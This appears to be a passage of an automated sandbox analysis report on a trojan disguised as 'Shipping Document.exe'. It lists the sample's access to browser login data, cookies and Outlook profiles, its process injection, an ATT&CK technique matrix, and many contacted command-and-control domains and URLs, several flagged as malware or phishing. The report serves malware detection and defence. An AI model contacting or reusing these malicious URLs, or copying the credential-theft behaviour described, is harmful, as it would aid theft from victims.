            Source: C:\Windows\SysWOW64\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Shipping Document.exeBinary or memory string: WIN_81
            Source: Shipping Document.exeBinary or memory string: WIN_XP
            Source: Shipping Document.exeBinary or memory string: WIN_XPe
            Source: Shipping Document.exeBinary or memory string: WIN_VISTA
            Source: Shipping Document.exeBinary or memory string: WIN_7
            Source: Shipping Document.exeBinary or memory string: WIN_8
            Source: Shipping Document.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01036596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_01036596
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01036A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_01036A5A
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            2
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS16
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets51
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447908 Sample: Shipping Document.exe Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 28 www.ziontool.xyz 2->28 30 www.autonomyai.xyz 2->30 32 20 other IPs or domains 2->32 42 Snort IDS alert for network traffic 2->42 44 Multi AV Scanner detection for domain / URL 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 7 other signatures 2->50 10 Shipping Document.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 tvtoHmZUTcBKRIVpHYXPXI.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 certreq.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 2 other signatures 19->58 22 tvtoHmZUTcBKRIVpHYXPXI.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 pricekaboom.com 185.31.240.240, 63198, 63199, 63200 ZONEZoneMediaOUEE Estonia 22->34 36 www.ziontool.xyz 203.161.43.227, 63186, 63187, 63188 VNPT-AS-VNVNPTCorpVN Malaysia 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Shipping Document.exe54%ReversingLabsWin32.Trojan.Strab
            Shipping Document.exe37%VirustotalBrowse
            Shipping Document.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            www.gamemaster.at0%VirustotalBrowse
            www.annahaywardva.co.uk0%VirustotalBrowse
            www.busypro.net0%VirustotalBrowse
            www.fruitique.co.uk1%VirustotalBrowse
            pricekaboom.com4%VirustotalBrowse
            autonomyai.xyz2%VirustotalBrowse
            www.swordshoop.ca0%VirustotalBrowse
            www.ziontool.xyz1%VirustotalBrowse
            ghs.googlehosted.com0%VirustotalBrowse
            www.autonomyai.xyz2%VirustotalBrowse
            www.auronhouse.com8%VirustotalBrowse
            ukscan.co.uk1%VirustotalBrowse
            www.ukscan.co.uk0%VirustotalBrowse
            www.drapples.club1%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.performacetoyota.ca/opfh/0%Avira URL Cloudsafe
            https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js0%Avira URL Cloudsafe
            http://www.performacetoyota.ca/opfh/0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js0%VirustotalBrowse
            http://www.auronhouse.com/opfh/12%VirustotalBrowse
            http://www.auronhouse.com/opfh/100%Avira URL Cloudmalware
            https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c0%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c0%Avira URL Cloudsafe
            http://www.swordshoop.ca/opfh/0%Avira URL Cloudsafe
            http://www.busypro.net/opfh/0%Avira URL Cloudsafe
            http://www.y94hr.top/opfh/0%Avira URL Cloudsafe
            https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js0%VirustotalBrowse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://www.fasthosts.co.uk/domain-names/search/?domain=$0%Avira URL Cloudsafe
            http://www.pharmacielorraine.fr/opfh/?R40L6=FpNucvzIjWOmZMmiXb56c6bY69+Kb+n3d8h+TlHEUGgG180M1/D8mOTG6mRn1YM4wyonPK4hNo3l6hpm9fEjrGx3GgV25NLdT3AKPeddSoL4M+kWNe1Dr4885y6woZHnwBfR8wPvVVyX&b2PX=hZXl7VFPKl040%Avira URL Cloudsafe
            http://www.drapples.club/opfh/100%Avira URL Cloudphishing
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            http://www.swordshoop.ca/opfh/2%VirustotalBrowse
            http://www.pharmacielorraine.fr/opfh/0%Avira URL Cloudsafe
            http://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04100%Avira URL Cloudmalware
            http://www.ukscan.co.uk/opfh/?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04100%Avira URL Cloudmalware
            https://www.fasthosts.co.uk/domain-names/search/?domain=$0%VirustotalBrowse
            https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js0%Avira URL Cloudsafe
            http://www.ukscan.co.uk/opfh/100%Avira URL Cloudmalware
            http://www.pricekaboom.com/opfh/100%Avira URL Cloudmalware
            http://www.gamemaster.at/opfh/?R40L6=PC685LTb06jHOCK4vGHbFQZ2xkI1XLFU2OtxALHCeHx3vCzda7v1dhtYxdz770kbIy0AX5udiNTwR8fzRWvU0kdzv6lB2tOiWMAiJN+HcPhB483U4R/s/Re5ANHairphm1/7Mj/vaUsb&b2PX=hZXl7VFPKl040%Avira URL Cloudsafe
            http://www.ziontool.xyz/opfh/0%Avira URL Cloudsafe
            http://www.pricekaboom.com/opfh/?R40L6=i+7S41wOBsHRtkSR5z49LNLl1g14jCJSsH67VhPHZINUfWrbgsYvxB6MwE8qgxdKQETWoz01bCGz4LwvUs/3BJoUBrhuAwUbkATTebp7Ts+JQM1y8oWpV0wDLMDnSIORGtRyV6PjEdP1&b2PX=hZXl7VFPKl04100%Avira URL Cloudmalware
            https://www.google.com0%Avira URL Cloudsafe
            https://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/100%Avira URL Cloudmalware
            http://www.y94hr.top/opfh/?R40L6=+MQIh7XosrcV1YUvfmXLRZp9qVlVCaTixn9Z4SHGNrQWXqYuOwa/VK9HsnlVTmeIhuhJsBbQG3swuyVkvGLKXJd4NOCZwBpwFucJm+lE/1jiLpvFuFHXohi2H4hODzVegRzQFrQhMICC&b2PX=hZXl7VFPKl040%Avira URL Cloudsafe
            http://www.y94hr.top0%Avira URL Cloudsafe
            http://www.busypro.net/opfh/0%VirustotalBrowse
            https://fasthosts.co.uk/0%Avira URL Cloudsafe
            http://www.batchscraper.com/opfh/?R40L6=AGl44rzTw2dIC+2fJHSMY5CagqpMx9ss+xDw2ILHnY0V4XytCPUwKd/QF5kiL9X2gIgUWxZ6E+yGLjvXAstM4MAyIKs/O1HO2djzFZ+svgnMXhmr1Gwb4CXwLPvvhByMEXNfrkehm32q&b2PX=hZXl7VFPKl04100%Avira URL Cloudmalware
            http://www.autonomyai.xyz/opfh/0%Avira URL Cloudsafe
            http://www.busypro.net/opfh/?R40L6=wk5WmycUod9Ch4sGNMfw6PGGK537NvyqKve97Rqxx64bZj5Y6/ZXBsSfuT6LL9ibplMzreLTp4ANFGROZWA3htlR8tjUt25lxV/kg4OrCh2epctFiYjQQV8YBu8QEUXGE65qscSGJJfb&b2PX=hZXl7VFPKl040%Avira URL Cloudsafe
            https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_0%Avira URL Cloudsafe
            http://www.performacetoyota.ca/opfh/?R40L6=i4up9kvrIhZylhTl+TGF8NSB39il2c4qnhHhVcZTirCO4e+BACowf4KjePAiAuddepejX0cVJHKGxf87gLVZ3yhxJ+t5gkh7Sx8ygwwh5CFsGAn8/fc7zcPpOBOJ0Z4qUeJ8jZdFyiV9&b2PX=hZXl7VFPKl040%Avira URL Cloudsafe
            http://www.fruitique.co.uk/opfh/0%Avira URL Cloudsafe
            http://www.annahaywardva.co.uk/opfh/?R40L6=rBeI5JL4SdE8nFW9pIUfBkvOLwnHMU9O9JCyLdspFwofGsVtAi0tgWeg3zHJ2XnwxoW6lgl8FdELwhlchXf8iZDZl79NZT9hgeyhr+mr8upFSzDJKwHDStxLaliRPfjpA6FezmrpjIYZ&b2PX=hZXl7VFPKl04100%Avira URL Cloudmalware
            http://www.annahaywardva.co.uk/opfh/100%Avira URL Cloudmalware
            https://static.fasthosts.co.uk/icons/favicon.ico0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css0%Avira URL Cloudsafe
            http://www.ziontool.xyz/opfh/?R40L6=YUsgxJYlBZRF0No39lc3JbqbmV5Q7LZCTky4dVHopuN0Ho35s4wXwSWKkFKDUjWggieTnElUH3EcFS8A7QGjP8jAu/34q2WYLtH3kt2+sJ07P+s7RD70L6colfRzV4eR9N3BYmYWcCpx&b2PX=hZXl7VFPKl040%Avira URL Cloudsafe
            http://www.drapples.club/opfh/?R40L6=ItiWO1iWeFtHa8hPek+OcHyLbef7ZgLT8jCYd//+XcZZdI8PxrJa9smp+DWZYnBxcEEGiLIUcWsNzCqVKSWt292FhOiPAibVi2DXZfZ1Bcb5xD1zZxmn+AopE2U6Sy6WzAqAlkUlqKwq&b2PX=hZXl7VFPKl04100%Avira URL Cloudphishing
            http://www.gamemaster.at/opfh/0%Avira URL Cloudsafe
            https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.pharmacielorraine.fr
            91.195.240.92
            truetrue
              unknown
              www.gamemaster.at
              199.59.243.225
              truetrueunknown
              www.annahaywardva.co.uk
              213.171.195.105
              truetrueunknown
              www.busypro.net
              160.251.148.118
              truetrueunknown
              www.fruitique.co.uk
              212.227.172.253
              truetrueunknown
              pricekaboom.com
              185.31.240.240
              truetrueunknown
              autonomyai.xyz
              3.33.130.190
              truetrueunknown
              www.performacetoyota.ca
              199.59.243.225
              truetrue
                unknown
                y94hr.top
                38.47.207.149
                truetrue
                  unknown
                  94950.bodis.com
                  199.59.243.225
                  truetrue
                    unknown
                    www.swordshoop.ca
                    199.59.243.225
                    truetrueunknown
                    www.ziontool.xyz
                    203.161.43.227
                    truetrueunknown
                    www.batchscraper.com
                    172.67.190.203
                    truetrue
                      unknown
                      ghs.googlehosted.com
                      142.250.186.51
                      truefalseunknown
                      ukscan.co.uk
                      3.33.130.190
                      truetrueunknown
                      www.autonomyai.xyz
                      unknown
                      unknowntrueunknown
                      www.auronhouse.com
                      unknown
                      unknowntrueunknown
                      www.pricekaboom.com
                      unknown
                      unknowntrue
                        unknown
                        www.digishieldu.online
                        unknown
                        unknowntrue
                          unknown
                          www.ukscan.co.uk
                          unknown
                          unknowntrueunknown
                          www.drapples.club
                          unknown
                          unknowntrueunknown
                          www.y94hr.top
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            http://www.performacetoyota.ca/opfh/true
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.auronhouse.com/opfh/false
                            • 12%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            unknown
                            http://www.busypro.net/opfh/true
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.swordshoop.ca/opfh/true
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.y94hr.top/opfh/true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.pharmacielorraine.fr/opfh/?R40L6=FpNucvzIjWOmZMmiXb56c6bY69+Kb+n3d8h+TlHEUGgG180M1/D8mOTG6mRn1YM4wyonPK4hNo3l6hpm9fEjrGx3GgV25NLdT3AKPeddSoL4M+kWNe1Dr4885y6woZHnwBfR8wPvVVyX&b2PX=hZXl7VFPKl04true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.drapples.club/opfh/true
                            • Avira URL Cloud: phishing
                            unknown
                            http://www.pharmacielorraine.fr/opfh/true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.ukscan.co.uk/opfh/?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04true
                            • Avira URL Cloud: malware
                            unknown
                            http://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04false
                            • Avira URL Cloud: malware
                            unknown
                            http://www.ukscan.co.uk/opfh/true
                            • Avira URL Cloud: malware
                            unknown
                            http://www.pricekaboom.com/opfh/true
                            • Avira URL Cloud: malware
                            unknown
                            http://www.gamemaster.at/opfh/?R40L6=PC685LTb06jHOCK4vGHbFQZ2xkI1XLFU2OtxALHCeHx3vCzda7v1dhtYxdz770kbIy0AX5udiNTwR8fzRWvU0kdzv6lB2tOiWMAiJN+HcPhB483U4R/s/Re5ANHairphm1/7Mj/vaUsb&b2PX=hZXl7VFPKl04true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.ziontool.xyz/opfh/true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.pricekaboom.com/opfh/?R40L6=i+7S41wOBsHRtkSR5z49LNLl1g14jCJSsH67VhPHZINUfWrbgsYvxB6MwE8qgxdKQETWoz01bCGz4LwvUs/3BJoUBrhuAwUbkATTebp7Ts+JQM1y8oWpV0wDLMDnSIORGtRyV6PjEdP1&b2PX=hZXl7VFPKl04true
                            • Avira URL Cloud: malware
                            unknown
                            http://www.y94hr.top/opfh/?R40L6=+MQIh7XosrcV1YUvfmXLRZp9qVlVCaTixn9Z4SHGNrQWXqYuOwa/VK9HsnlVTmeIhuhJsBbQG3swuyVkvGLKXJd4NOCZwBpwFucJm+lE/1jiLpvFuFHXohi2H4hODzVegRzQFrQhMICC&b2PX=hZXl7VFPKl04true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.batchscraper.com/opfh/?R40L6=AGl44rzTw2dIC+2fJHSMY5CagqpMx9ss+xDw2ILHnY0V4XytCPUwKd/QF5kiL9X2gIgUWxZ6E+yGLjvXAstM4MAyIKs/O1HO2djzFZ+svgnMXhmr1Gwb4CXwLPvvhByMEXNfrkehm32q&b2PX=hZXl7VFPKl04true
                            • Avira URL Cloud: malware
                            unknown
                            http://www.autonomyai.xyz/opfh/true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.busypro.net/opfh/?R40L6=wk5WmycUod9Ch4sGNMfw6PGGK537NvyqKve97Rqxx64bZj5Y6/ZXBsSfuT6LL9ibplMzreLTp4ANFGROZWA3htlR8tjUt25lxV/kg4OrCh2epctFiYjQQV8YBu8QEUXGE65qscSGJJfb&b2PX=hZXl7VFPKl04true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.performacetoyota.ca/opfh/?R40L6=i4up9kvrIhZylhTl+TGF8NSB39il2c4qnhHhVcZTirCO4e+BACowf4KjePAiAuddepejX0cVJHKGxf87gLVZ3yhxJ+t5gkh7Sx8ygwwh5CFsGAn8/fc7zcPpOBOJ0Z4qUeJ8jZdFyiV9&b2PX=hZXl7VFPKl04true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fruitique.co.uk/opfh/true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.annahaywardva.co.uk/opfh/?R40L6=rBeI5JL4SdE8nFW9pIUfBkvOLwnHMU9O9JCyLdspFwofGsVtAi0tgWeg3zHJ2XnwxoW6lgl8FdELwhlchXf8iZDZl79NZT9hgeyhr+mr8upFSzDJKwHDStxLaliRPfjpA6FezmrpjIYZ&b2PX=hZXl7VFPKl04true
                            • Avira URL Cloud: malware
                            unknown
                            http://www.annahaywardva.co.uk/opfh/true
                            • Avira URL Cloud: malware
                            unknown
                            http://www.ziontool.xyz/opfh/?R40L6=YUsgxJYlBZRF0No39lc3JbqbmV5Q7LZCTky4dVHopuN0Ho35s4wXwSWKkFKDUjWggieTnElUH3EcFS8A7QGjP8jAu/34q2WYLtH3kt2+sJ07P+s7RD70L6colfRzV4eR9N3BYmYWcCpx&b2PX=hZXl7VFPKl04true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.drapples.club/opfh/?R40L6=ItiWO1iWeFtHa8hPek+OcHyLbef7ZgLT8jCYd//+XcZZdI8PxrJa9smp+DWZYnBxcEEGiLIUcWsNzCqVKSWt292FhOiPAibVi2DXZfZ1Bcb5xD1zZxmn+AopE2U6Sy6WzAqAlkUlqKwq&b2PX=hZXl7VFPKl04true
                            • Avira URL Cloud: phishing
                            unknown
                            http://www.gamemaster.at/opfh/true
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabcertreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/ac/?q=certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icocertreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.jscertreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.jscertreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.csvchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.fasthosts.co.uk/domain-names/search/?domain=$certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.jscertreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.ecosia.org/newtab/certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://ac.ecosia.org/autocomplete?q=certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/certreq.exe, 00000004.00000002.3986547187.00000000060B6000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003796000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
